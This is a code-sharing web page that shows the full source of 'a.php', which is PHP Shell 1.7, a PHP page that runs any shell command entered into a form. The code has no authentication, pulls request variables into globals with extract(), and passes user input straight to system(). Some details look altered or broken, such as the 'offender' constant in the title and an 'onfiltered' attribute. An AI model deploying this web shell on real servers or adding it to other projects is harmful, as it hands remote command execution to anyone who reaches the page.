Php : a.php

Titrea.php
Postée le18-03-2008
Affichée220
Lienhttp://www.codeswall.info/source-29.html
DescriptionFichier inconnu...
EtatInconnu. Inconnu.
Code d'insertion
OptionsRetirer les numéros de lignes.
TéléchargementTelecharger en format txtTelecharger en format pdf
  1. <?php
  2. define('PHPSHELL_VERSION', '1.7');
  3. /*
  4.   **************************************************************
  5.   *                        PHP Shell                           *
  6.   **************************************************************
  7.   $Id: phpshell.php,v 1.18 2002/09/18 15:49:54 gimpster Exp $
  8.   PHP Shell is aninteractive PHP-page that will execute any command
  9.   entered. See the files README and INSTALL or http://www.gimpster.com
  10.   for further information.
  11.   Copyright (C) 2000-2002 Martin Geisler <gimpster@gimpster.com>
  12.   This program is free software; you can redistribute it and/or
  13.   modify it under the terms of the GNU General Public License
  14.   as published by the Free Software Foundation; either version 2
  15.   of the License, or (at your option) any later version.
  16.    
  17.   This program is distributed in the hope that it will be useful,
  18.   but WITHOUT ANY WARRANTY; without even the implied warranty of
  19.   MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
  20.   GNU General Public License for more details.
  21.    
  22.   You can get a copy of the GNU General Public License from this
  23.   address: http://www.gnu.org/copyleft/gpl.html#SEC1
  24.   You can also write to the Free Software Foundation, Inc., 59 Temple
  25.   Place - Suite 330, Boston, MA  02111-1307, USA.
  26.    
  27. */
  28. ?>
  29. <html>
  30. <head>
  31. <title>PHP Shell <?php echo offender ?></title>
  32. <meta http-equiv="Content-Type" content="text/html; charset=windows-1250"></head>
  33. <body>
  34. <h1>PHP Shell <?php echo offender ?></h1>
  35. <?php
  36. if (ini_get('register_globals') != '1') {
  37.   /* We'll register the variables as globals: */
  38.   if (!empty($HTTP_POST_VARS))
  39.     extract($HTTP_POST_VARS);
  40.    
  41.   if (!empty($HTTP_GET_VARS))
  42.     extract($HTTP_GET_VARS);
  43.   if (!empty($HTTP_SERVER_VARS))
  44.     extract($HTTP_SERVER_VARS);
  45. }
  46. /* First we check if there has been asked for a working directory. */
  47. if (!empty($work_dir)) {
  48.   /* A workdir has been asked for */
  49.   if (!empty($command)) {
  50.     if (ereg('^[[:blank:]]*cd[[:blank:]]+([^;]+)$', $command, $regs)) {
  51.       /* We try and match a cd command. */
  52.       if ($regs[1][0] == '/') {
  53.         $new_dir = $regs[1]; // 'cd /something/...'
  54.       } else {
  55.         $new_dir = $work_dir . '/' . $regs[1]; // 'cd somedir/...'
  56.       }
  57.       if (file_exists($new_dir) && is_dir($new_dir)) {
  58.         $work_dir = $new_dir;
  59.       }
  60.       unset($command);
  61.     }
  62.   }
  63. }
  64. if (file_exists($work_dir) && is_dir($work_dir)) {
  65.   /* We change directory to that dir: */
  66.   chdir($work_dir);
  67. }
  68. /* We now update $work_dir to avoid things like '/foo/../bar': */
  69. $work_dir = exec('pwd');
  70. ?>
  71. <form name="myform" action="<?php echo $PHP_SELF ?>" method="post">
  72. <p>Current working directory: <b>
  73. <?php
  74. $work_dir_splitted = explode('/', substr($work_dir, 1));
  75. echo '<a href="' . $PHP_SELF . '?work_dir=/">Root</a>/';
  76. if (!empty($work_dir_splitted[0])) {
  77.   $path = '';
  78.   for ($i = 0; $i < count($work_dir_splitted); $i++) {
  79.     $path .= '/' . $work_dir_splitted[$i];
  80.     printf('<a href="%s?work_dir=%s">%s</a>/',
  81.            $PHP_SELF, urlencode($path), $work_dir_splitted[$i]);
  82.   }
  83. }
  84. ?></b></p>
  85. <p>Choose new working directory:
  86. <select name="work_dir" onfiltered="this.form.submit()">
  87. <?php
  88. /* Now we make a list of the directories. */
  89. $dir_handle = opendir($work_dir);
  90. /* Run through all the files and directories to find the dirs. */
  91. while ($dir = readdir($dir_handle)) {
  92.   if (is_dir($dir)) {
  93.     if ($dir == '.') {
  94.       echo "<option value=\"$work_dir\" selected>Current Directory</option>\n";
  95.     } elseif ($dir == '..') {
  96.       /* We have found the parent dir. We must be carefull if the parent
  97.      directory is the root directory (/). */
  98.       if (strlen($work_dir) == 1) {
  99.     /* work_dir is only 1 charecter - it can only be / There's no
  100.           parent directory then. */
  101.       } elseif (strrpos($work_dir, '/') == 0) {
  102.     /* The last / in work_dir were the first charecter.
  103.        This means that we have a top-level directory
  104.        eg. /bin or /home etc... */
  105.       echo "<option value=\"/\">Parent Directory</option>\n";
  106.       } else {
  107.       /* We do a little bit of string-manipulation to find the parent
  108.      directory... Trust me - it works :-) */
  109.       echo "<option value=\"". strrev(substr(strstr(strrev($work_dir), "/"), 1)) ."\">Parent Directory</option>\n";
  110.       }
  111.     } else {
  112.       if ($work_dir == '/') {
  113.     echo "<option value=\"$work_dir$dir\">$dir</option>\n";
  114.       } else {
  115.     echo "<option value=\"$work_dir/$dir\">$dir</option>\n";
  116.       }
  117.     }
  118.   }
  119. }
  120. closedir($dir_handle);
  121. ?>
  122. </select></p>
  123. <p>Command: <input type="text" name="command" size="60">
  124. <input name="submit_btn" type="submit" value="Execute Command"></p>
  125. <p>Enable <code>stderr</code>-trapping? <input type="checkbox" name="stderr"></p>
  126. <textarea cols="80" rows="20" readonly>
  127. <?php
  128. if (!empty($command)) {
  129.   if ($stderr) {
  130.     $tmpfile = tempnam('/tmp', 'phpshell');
  131.     $command .= " 1> $tmpfile 2>&1; " .
  132.     "cat $tmpfile; rm $tmpfile";
  133.   } else if ($command == 'ls') {
  134.     /* ls looks much better with ' -F', IMHO. */
  135.     $command .= ' -F';
  136.   }
  137.   system($command);
  138. }
  139. ?>